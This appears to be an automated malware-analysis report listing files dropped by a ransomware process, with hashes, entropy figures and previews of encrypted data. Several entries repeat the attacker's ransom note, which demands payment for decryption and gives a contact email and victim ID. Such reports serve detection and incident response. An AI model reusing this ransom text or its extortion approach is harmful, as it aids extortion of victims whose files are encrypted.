                                                                                            MD5:15E794EBE96852357435AEB4BB45D3BD
                                                                                            SHA1:05015188A1047A4415D7EA20A11D56EA7B26DCB5
                                                                                            SHA-256:3A98728545FA21134C95FA2BF95CC232CB0006C2302F31295B6E6C3488CCAEE0
                                                                                            SHA-512:59A81844CD423F5A593003999CC01D72FDE982927B41A09ACE95360C1E36FC93789682BC229C294F73CE23F39EA0DABF619A091AF33946423F059A9C1C48CA54
                                                                                            Malicious:false
                                                                                            Preview:_.B`K..c{....lj?[11....;...-..2....{..5}i.Q.^....B2p2.cW.....*.q..<.S..r'8aK....w.i..7o#.....w.amazon.com/..|....Y..L..D.).<.j...a.......D...s.Bfl...N.?CQ.@..5....2..O..`...MiLu..&.?.y....6.s...Q.3V[.t"w..;9.?.n./qd......Y..a...Z..E..w .4.....lO..J..Z..0k.S....c.........Lz{b?..U.....K*..R.....%...i......V.'....`.qV. ..#.!.EA...9.<Y....4...76......]C.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):474
                                                                                            Entropy (8bit):7.574161552908091
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T8VwRd9BA7tRMv24oJ6KJFTdK8zWSBeEDtc7n:T8VkBqRMMJFT1vhU
                                                                                            MD5:C6B585090D71D9EE23D2C41A0B037668
                                                                                            SHA1:CD5C27E272741641B2F5AC31859E511D991A47BE
                                                                                            SHA-256:7B2452FE502A53ABF049EFF488BABB3D19C1DDDB59AEDEFB93FD6C11DFE78DDB
                                                                                            SHA-512:6F5493751630C80648D4F07722A0CA63F788451C7B52DF3BC9FF0E7D592EA0B0DD082FB113E8CB85CA128872A33ABD1227FC01E4A7EE2E4E06326779F6B8A02F
                                                                                            Malicious:false
                                                                                            Preview:.J...2Qo.E.h...o....b...J.i...a?..Y....:......0..co.i;.......Q.'.:....^A...-..n...o;....u.....Yq....~c./....(....H.K..4.D.d-(..;.......mr`.=..?MH...*...p....(..4..<{..3...[o.......%\.#..mages\bing.ico..{{.....z.&PGX.|...(/4..y..[....8..o.|....m%=..v...r..e..t.......-.....D..o....s 9W./..sR._....W.c.Bv.....,..;..w...v.p,.QK...].V&i(....l#.UK......GKk..w"86`.D....Lpf~'yJy....C.[.Ml.in.-..Mo...g..$).r}..]Cn-n..R.y..}.#M=....!..!..!....^..<...Ep0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):379
                                                                                            Entropy (8bit):7.442465451192671
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:VaUUz6Fi85DXLR0X83F8H9RFJBV/h4xu1ZLZLf8HrcdrcKbM4JI+Hn:V/Uz6Fi85DfFaRBJSeZLZL+wdrcZEI+H
                                                                                            MD5:312B57A222EA0FB34A11A30DF3DB1F9C
                                                                                            SHA1:A2B557FA6967488C9018C4A05CE47068058F4331
                                                                                            SHA-256:798B565AF37CA0C3510F63C19D06B923B2E13A878D75A1E204AAA4BCBE7705A4
                                                                                            SHA-512:0D551499F0C244CC500DC4C70647F5769D100EFEAD307767D70FB8E04EEA603BEA545D147A3E8E73C7E53FAF73B62F12472253A0413CF57A43C68CC505B09E15
                                                                                            Malicious:false
                                                                                            Preview:...=d..|V.<..>B.....sb.[......>......".5..a..N..9.i<PO..`.]..W...... f.m.d.@hM.7rm.\..E.......(.j.....|...[..l.._.0...p.....e...C..&.-.(...:...[.....HC..t<....j......F.:c...p.+..#.f....;.4...@...i.....O.>..<..y....{.r..I1R4.Rq!... ._..sXO|.....+.....a...N.P................?cTQ.I.."..(o..T....K....y.R.x!qa.f..w..P....|....K.....Dzzj....y.7r.,....>.F...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.476548283523894
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:CkgikwYTZjj93shObXYMYIcOvD/ELKaX83J1K2gU6ob3JfS0k9umJXDq5euVQkSn:IikXj93shObXYMvcO7W7X8J1Kqrq0k9H
                                                                                            MD5:540F671DD0FB4031338D78DC7B798099
                                                                                            SHA1:5B9FAD91A08A6DA4DB01F05D66CD4940D332D61A
                                                                                            SHA-256:7362D9E04505A9A60E458B1BC190A02258AADAD976094D284659F68376B3A691
                                                                                            SHA-512:ECB605409D93AE62DE73E4F16C52E821C48C9F16B6CCC9A64D88001F8F9B0DDBAE0530F493AC900A447BFC5CD7CA6219CC8A6F040B5C864564A9BC76BA897B41
                                                                                            Malicious:false
                                                                                            Preview:vgQ.g...<K...+......s]..Y.h......v.#.0.wa?J...h...+|........}......r.;.b~...2..KN]'..Vb..@w.google.com/.._..c......P....a...7..{..S6^N...-.,.J..........,R.X.3.0.Z.I....._...!;._....3..z+.o...."..rDx.^....+FX.k$........K.t.J......gN%...:...|.......C.l.1.\kh6=...3.O..H9...(.(=@X.^.....A.c......]X5.."..t........]......T...nx..dt.#...6.V....V.\....V.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):375
                                                                                            Entropy (8bit):7.396875485348006
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ybZCVBBlJcNvJKQngonJb+luNRhEvZBOnU6dqr+0PlfeUmutImn:eM7Bl0RKQn5b+lcRhEXd6dqNPwmn
                                                                                            MD5:641F59CC8A2142AAFE9A6DA5A53DC6DC
                                                                                            SHA1:D537467807064D7AE9827822492902A088A25EB5
                                                                                            SHA-256:24D9203C8221F9E9704792C4FE12FD8E2935537441F20AD6C82B59DC40015C88
                                                                                            SHA-512:295B6C56B2362F6ABE85CBAB05A5D2A2B1D588E33A9B14D4216DEE2E17439DD578F5E06D03AFFBA47E6BB5E0ADE24EBF114AC05E3A0926618BE28CFDCD096B93
                                                                                            Malicious:false
                                                                                            Preview:.UAKZ.....+mR......[;.Q.....vl.....T...V..H..=7k.*...m.`/...A$.U.A.(...0b.?.....F......bw.live.com/.....l,....\?.#.`&ys......N.........w.&.......l.....k....}e..l...o.......P$5...2.yC....D..X...E.....H.>.3..r.Kr.a.7.&v.5u...We0.....W=.9.$..z"._....o...%.x(8....]B..Z......U1@..]...2.:.".a..-.c.%...:..mI.p.'..U..qt.......&.......L.i/.>.B.I..f..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.423102313197335
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FualOGLf+LvhW/+I1KpGvNVBqCn0WcbN9YYMiB9yAlbbPmqAc8HChPcfFEIYQ4wO:FuX0WbGvBqCuAYMUrbbPb8CPcf+FtwOn
                                                                                            MD5:1546A5D0B9EC3CD0B63B0E593033952D
                                                                                            SHA1:685F9395F6E3EBEBE3507D1D4F06421FAC5FB844
                                                                                            SHA-256:812957ECE73302BD3D60C6ADDE1A1BD9275C3A2646E744D6F7F7644C24FF083A
                                                                                            SHA-512:403A38AB69660CD2052E46641B761C4167B2339B8290CFECC3BA1084D5701B8004B856476D3614D6831C72A1303D9312FC57EC88D9E00C85DA9F12EDFEC56979
                                                                                            Malicious:false
                                                                                            Preview:...5...p.j...ip.<..U?q..h^.S..$..X].zPe..Ws.#.735.D../.O..........}.=..!b...^.... ../.fR...J.w.nytimes.com/.."j.....r...|.4.*..p_...$8...S:OV.J.n..!FZ..D....*.R.'AK./.......!E.....x.\ZY......Ogt.$u..Yaz.O9k..'|s}.@..\t.....s.~}...~...b#."Y.......j5......9.....D...r.{......w..:.E..='.j.0.n..I./.....q.../.%8......i....:j...sz..9.]....B.mV}..N..t..m-..v.Y*0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.488144047799495
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:T9SfaIFX8gP8dAqicE6Zl4LrHPbM5SS3LENWxHrJ9B9bnOqmHn:TwJsgAriZ6wLrDM5SCyWBrB5nOqwn
                                                                                            MD5:0BB95D7944C7F218472362448821AA4D
                                                                                            SHA1:A7DA40A15CD2DBB75C3522BCDB7EF9ED483080EA
                                                                                            SHA-256:0EBB70291BBC470AF6708AB99753565D6E246092CAFE3C80684B14046744496F
                                                                                            SHA-512:83098581CAC967E12CDC06356A576C4A7BFDFC7EEEAAAF16FD5D46740C9BE84774AE636D68393ACCB1B89293E06CF5F87F2AD53B50E0F8ED8A655CF3275AE497
                                                                                            Malicious:false
                                                                                            Preview:.t.3.d.r...._..N.7..O.ZK.{2.&......gT.<.j..)..vL.`H...]..I.c.l..g..1.I..E}..9..b...O.`\..L.pw.reddit.com/..S~..&5.[#....Fy...1.A.._.a..k..#...*...t...9..l.!.u.....xa.b6.cs:D..!J.%."...n..........d1.e0.:/....O../B......?.q.a7l.$.^Y...N.B.Zd@6..>....)..=..l..~..Ji..I.RAn.._V.H.............YK".oU..3...lU...Ltr.J.,.m....A....>..p..*....q..:R.....V.'..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.4260213688792405
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YR2b2RST03FugJSXaxhhZCjOMojRc4+wZC7kLI1ajbP8214xlguYCa2QN7hkWATn:YRFSTOFuLkuQG4+Hh1an6/gZDzi4tsIU
                                                                                            MD5:DC79BCD2CE0A68977E300ADC0FADACC6
                                                                                            SHA1:A1B2443E23CC6EA57A4F593365CC0BBA5C4C78DA
                                                                                            SHA-256:40B68B116762A050B75CB7CA96E3214B33F06BD426118DD6EA4C6DBBC1C7EF44
                                                                                            SHA-512:554ADBC4EE63B56A08036D5BDBAF68668DAB5389DB67807EFF34E98E15B323CA8F73E8BD242534DB767BF556219E0D270EE3EAC6B44EFDA5E4670A9D41BA99C5
                                                                                            Malicious:false
                                                                                            Preview:....Z...Z2...[..p...G..R../....#T......<.."..s..7..+{..O:U..v.g...v".3[.....(wT..b...juH.Nw.twitter.com/.......EZ..t..r_....j..l..A.A=...z...}...g\....3.;@-.....%...G.Th7K..`.."s.....W.G....h....^..jdbiA......q.x....W..f.....t.Z?J..M.j....b..._L.hus.9.@#e........G_....F..Goe./e?.^...!.(bYw.........j.t......iI ......3..I..DJ.`r3......C..*..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):380
                                                                                            Entropy (8bit):7.425225371637327
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:eo0MGDjVshMfB+9Wiu0okUwCKNK0WWjyCzR1fbBfs1hzXz7GiFrJVTJ3FHeZ8w7Z:N0LDjuhBu0okr1NHRjywLbpOhzXz71jM
                                                                                            MD5:5B59E400A52481AD01C221A54A01EF2A
                                                                                            SHA1:BAC94E39C3C76D1AF3D19FF2726F71079866D50C
                                                                                            SHA-256:72D9B2CAE26E53C696AF00E0E78A987969D2628B6750588B56B07F4D44E06249
                                                                                            SHA-512:9FC4C318D11E10C668E78CF54AE833EDAA7B2FA1DE368AED58A8811401922E30F5C985CBF28E5BBD0B11D25B0DB8AC1D9D7662A131A3383774F85011617DF379
                                                                                            Malicious:false
                                                                                            Preview:.....F..v....!9<.O............(yjG..}/p.(.F.....Y.H/...}.w.iJ.p..\.....rDG(&!...E.v..m_......a.$/.)[Wyw3.....(!k8.Q@.'R....4...3'....{Er..;..}.e...L.!.....E.j.G.......q'&..Gx..U....{6D5..*.>H..V.Wm..$...Zt!gF.....~....a6...'.Ik..U.Q.Ow.H1...[O....r...b............R...d.....R...Tc8..X......m......._.....i."lv\....N...K. z....'.?}s..............0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.448432224759763
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:AAXLptMKoAqM1ddZZ0nG/v9RYx68ncgL2nlN8f81atd28LYJ+gTIAJ2WZDgImO9O:vLptJqyMnG/lRYxDcJlypfYcc5uxLXCe
                                                                                            MD5:0F784FDF2C0C03CF6821C87B5B81E763
                                                                                            SHA1:37D5E202596692FA97D95F6A8E528D5798EEAA6E
                                                                                            SHA-256:E027A4180DA32935E4DC3EFE5835F0EE78CED99DFD3BA3AD90F3C1474BF8C8B0
                                                                                            SHA-512:F4D6A17720CEF3B13E307BC6179B154C3A1C5FB45144940C25FFAD26CF21EC7529BEBC156495014AB849A0203EA8BA568E1F601C17E4302685B992E631DAC3F0
                                                                                            Malicious:false
                                                                                            Preview:.Z&..b.a..reipi....r...GkK....f.p.n{$.$:./.......41.F^K...^...e..f..J.w..."t...W&.>..EJw.youtube.com/......\.;9Dt..k8.$..[,.....Ul..|.Ve.6.Lg..x..........q..i.....:.#].....&.u..u.K..y..K./....9.Eyl..".......Y.c ...K.iL...d.4.y.Y...e.7I.r.6#bc...b...x.....gu.W&..........V.R]I./O..]}....U..F.P../.l2\.*%.}i..._..2anw3..........n..H....%....l).z..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:COM executable for DOS
                                                                                            Category:dropped
                                                                                            Size (bytes):1125
                                                                                            Entropy (8bit):7.8297443770615205
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:J7H2buN9eTeIAwVPRkBOLh6c5sua+dnF6sFcNYtuvm1kZ:9H2buCKIPpGy6c28AK8vmG
                                                                                            MD5:DD3FCD61C1B9AA8B30BBCF4DA1367251
                                                                                            SHA1:31B30DE369E0915E000E634DAFD53FD572541866
                                                                                            SHA-256:9DE94BC8AC731DA355ED9A915FA39ADE4BD430DD10B24BEFD48E319CD73E1F80
                                                                                            SHA-512:817CBB865F7C532A7C866BB3AB80DC5621A73FEFD79407CE7CBCE5B50B683E0BEF294CAE4AE5DC4DE95E69BBADF5579232342510D76F939ADA6FEDCAB74359C7
                                                                                            Malicious:false
                                                                                            Preview:.V .i.Z+..!.d.F:.p.:.8D..X`!H...Rn....0...6..wUn'$b.........>20.j.>N..o...~ ...Y..r}b..A4...|.Z.^,/..[.P........rN.....cX.7g.....H.:6.............ZW.4....!).>k|D>..s;............;.........|.E@....g...S.v......-..=..k4P5U..g..r...B.9@dx>5j..H.Y.z...rQ[()zCy..v._...7J{...Z..Hl....F.'...%/J..[.m.........x...g,......n#`.4.k6..HN.9.Ay..q.b).yW......\...x5.r*z.L..Y.....+8........Q..}}....;........H..H.......&...J`.S1.w=...g..pQ...........z..]...../%.$.P....L...,......p3".3..J.k..d.xr`....X.+...m....],-.7.'c....0.........?z../..Z.p.j.)0...!_..N/.\.HG.N. #H.1'r.......Osk..#.X..2!.+..x.'/.6+..,..;. .Tw*.Z..1?....dR.-......j..X...:...%6......fM.0/....r.p...|C.F.R..a../.[...0A..v..SBp...Y..~Ru.C.C.E<|.r....y>]....R.....}(L>Wz.lVf.$..........D..{....V.?..w...Hn.........Nzst.@..U..a.'..~.\....`Y.(.u...E..Ybescription>.......Wy.?..^Z.l4..y..D.6.'7..B.....X.w....Sx8..oY5../.......g...W..y........r.^...."...9...........8..U.;...o..q.o...*.2.As.S..].2.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):7.220471719644148
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:CxVEyTs7vxrOAuTcPjjgXElwZdC4KtabfSya2qCN8caNjetN/EjbbzlJn:gaewOAec7kewhKtIau8PjetNsjrlJn
                                                                                            MD5:F873F118060580FE550D4EDBE301DAB9
                                                                                            SHA1:B84BEDEF5FA7AF29282341CCD38A3053B9FA7A23
                                                                                            SHA-256:AFB3045D3D94D93940D66565E07E0B14ABDD4695A5A1C24FE4437F44153DB073
                                                                                            SHA-512:9224C5260B5D4D5A186ABAF2303FCA2C013E200896A4DF19283B6EAF35D9FDEECF582F5640E0B133B36165D03482BC04C1BBDAF13F45B1705AB25A45C605C5C4
                                                                                            Malicious:false
                                                                                            Preview:..h.....5. .NDO$...........=...).2...#..W. .O.-.a....2..V^2........"..z..=.z..b..../eh...C......n.{....v.BNk.E../.>.H....M.......\.(..F..n..t....-.{.my..6.#....p.v....K.L<..y.....np.Y|!.....d".k..j.CBD:9VS..a.c..K.....$..b*....i.\..e..~>|hL.O..%;..x.Y....t....Tn~..W0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):7.12397814780812
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:RORyKOo+N9OZMWAFOK1g8Uj05v9tLn1So14E95Fo4pWHjZmHn:RO2NrWAFOK1g8c05FRnso/9bl4NmHn
                                                                                            MD5:3CED7A361F6B5ADD4A6C6CCAA17A38F7
                                                                                            SHA1:E9B873A48CB88675D460B79696BDF932F65F9514
                                                                                            SHA-256:A5DCF5137B367685D3B8771B69763EBC05EBF881297612F1C14773A9A488A7F4
                                                                                            SHA-512:7427C17DCED54AA0287FCD40BA0FA7440CFD30D8CB4E54A99A8B546B71837C1FA5B842A3C7C7E61B01BD2F02D20B233A42F826DBBDCDF1E1716A253958E3ED3E
                                                                                            Malicious:false
                                                                                            Preview:.P...L..>Bm-.L.of.6...E.... ..x.d.n.s..~.....&.[R5.e&|G........7...kX.%..yG.5..:.s.|...w.Y..^^I..<..R..a.m..U..V..l....Z.h..E....-7..*...x,..p..i......'.Q>.."La...F=..{.....-.|..X,#..5t.f'.{ \H........ncK1R..{F.8.'.,3..*PP.:..c.N...).. ....v0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):20746
                                                                                            Entropy (8bit):2.577276504029665
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sTqEcFgDjmHYoCS2I7i11Enzum6hmHFRRh8ZECJZVRIAIdS+JXsLsKUtI:zFgmHYAi12zumImHHEZEyvRySAXsL2q
                                                                                            MD5:18BB060676ED9C7E71F467CC3BF46711
                                                                                            SHA1:3DFFFAD2954456C4F8EF62A69F199F2F08607107
                                                                                            SHA-256:DDBEAFF06A45F20D78535F620710DCA380C728EF4436FBBD6C501519C9B29BEB
                                                                                            SHA-512:3DD8C5C26FCE01314A85E8949A2E78CB2BEE06190BF179C75FA09D8F9F539B44D0FB2100E578E2D6D63A3034FC5C02002013192A3F8A45548D82AB65C52525CF
                                                                                            Malicious:false
                                                                                            Preview:7..~q.....r.P...F....}|.%....,h.@...{...../Vm....2.Ik.m.S....d; m3.|.].k..-z.cG.A{.pE......@.=B..o.L.j.Ns..d^...b9........8..9n6...q8...1....Y.9+..?.3?w.l>.}.g...s..I.:.D..H.7....+.....J'."..........RL.?...z:..]|...y&.p[....6k.j......i..t.v...f.#.0.Z+.~q>.s..%..*.G..{=(@.cPLBv.M.........r.Y........W..z..y5.:.&....!..1.`...G...!./...k.C..x...p..o..G}.Y.x....V..T.z....t.$#.z..4.;...\...+_....-.<&...._.L.N.E.;..@..!u8......r+.....<..b.m#.t.,....S..`/...b......Y.......V/..z..H5.@cU.s.}g.._]I..........|.e...3..#.:x..g..._y0.f.4......c.A...|.-@.....w.!.......C...-.)D.\...L.E..d.l...q....g0u[.&..>S@7Z.k3. ...E24..L.4.AW}d....;9..!..l.m........f.6/.=X......KP....&....S}.D.!..XnuX ...!\O.....1..6..u..0...3.gB.Z....b.>..q..@.d...W........,.\.....g.0...K.....y.F-U...V.m.[l.C..F."t..G.....>.!..g.S..}...P....H.2...37..X./7G...P.....P..K.w^1..9.?..zSc.P.'g..]...J.....T.K....w.b.V....z8.:...c.....R.u.m..>...).i......_#...'0....]/A...p.i..$!o.....]c..f
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):20746
                                                                                            Entropy (8bit):2.577276504029665
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sTqEcFgDjmHYoCS2I7i11Enzum6hmHFRRh8ZECJZVRIAIdS+JXsLsKUtI:zFgmHYAi12zumImHHEZEyvRySAXsL2q
                                                                                            MD5:18BB060676ED9C7E71F467CC3BF46711
                                                                                            SHA1:3DFFFAD2954456C4F8EF62A69F199F2F08607107
                                                                                            SHA-256:DDBEAFF06A45F20D78535F620710DCA380C728EF4436FBBD6C501519C9B29BEB
                                                                                            SHA-512:3DD8C5C26FCE01314A85E8949A2E78CB2BEE06190BF179C75FA09D8F9F539B44D0FB2100E578E2D6D63A3034FC5C02002013192A3F8A45548D82AB65C52525CF
                                                                                            Malicious:false
                                                                                            Preview:7..~q.....r.P...F....}|.%....,h.@...{...../Vm....2.Ik.m.S....d; m3.|.].k..-z.cG.A{.pE......@.=B..o.L.j.Ns..d^...b9........8..9n6...q8...1....Y.9+..?.3?w.l>.}.g...s..I.:.D..H.7....+.....J'."..........RL.?...z:..]|...y&.p[....6k.j......i..t.v...f.#.0.Z+.~q>.s..%..*.G..{=(@.cPLBv.M.........r.Y........W..z..y5.:.&....!..1.`...G...!./...k.C..x...p..o..G}.Y.x....V..T.z....t.$#.z..4.;...\...+_....-.<&...._.L.N.E.;..@..!u8......r+.....<..b.m#.t.,....S..`/...b......Y.......V/..z..H5.@cU.s.}g.._]I..........|.e...3..#.:x..g..._y0.f.4......c.A...|.-@.....w.!.......C...-.)D.\...L.E..d.l...q....g0u[.&..>S@7Z.k3. ...E24..L.4.AW}d....;9..!..l.m........f.6/.=X......KP....&....S}.D.!..XnuX ...!\O.....1..6..u..0...3.gB.Z....b.>..q..@.d...W........,.\.....g.0...K.....y.F-U...V.m.[l.C..F."t..G.....>.!..g.S..}...P....H.2...37..X./7G...P.....P..K.w^1..9.?..zSc.P.'g..]...J.....T.K....w.b.V....z8.:...c.....R.u.m..>...).i......_#...'0....]/A...p.i..$!o.....]c..f
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
